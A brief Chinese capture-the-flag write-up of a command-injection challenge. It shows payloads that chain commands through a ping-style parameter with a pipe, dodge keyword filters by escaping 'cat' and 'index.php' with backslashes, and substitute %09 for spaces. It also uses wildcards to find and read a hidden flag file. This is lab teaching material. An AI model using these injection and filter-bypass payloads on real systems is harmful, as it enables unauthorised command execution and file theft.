命令执行漏洞
尝试127.0.0.2|ls(|:无论左边是false还是true,右边都会执行)
发现了文件夹下有index.php,我们首先需要把它读出来(题目过滤了空格还有cat命令,也过滤了index和php字符串)
我们尝试收发现可以用c\a\t ind\e\x p\h\p来代替
空格可以用<或者%09来代替
burpsuite下可用%09(浏览器下可能不成功)
由indexelse if(preg_match("/.*f.*l.*a.g./", $ip)){
flag可能是flag.txt
构造payload去搜索
?url=127.0.0.2|find%09/%09-name%09???.???
哈哈,通配符的魅力
/etc/.findflag/flag.txt
搜索出来,flag用???去代替
url=127.0.0.2|c\a\t%09/etc/.find???/???.txt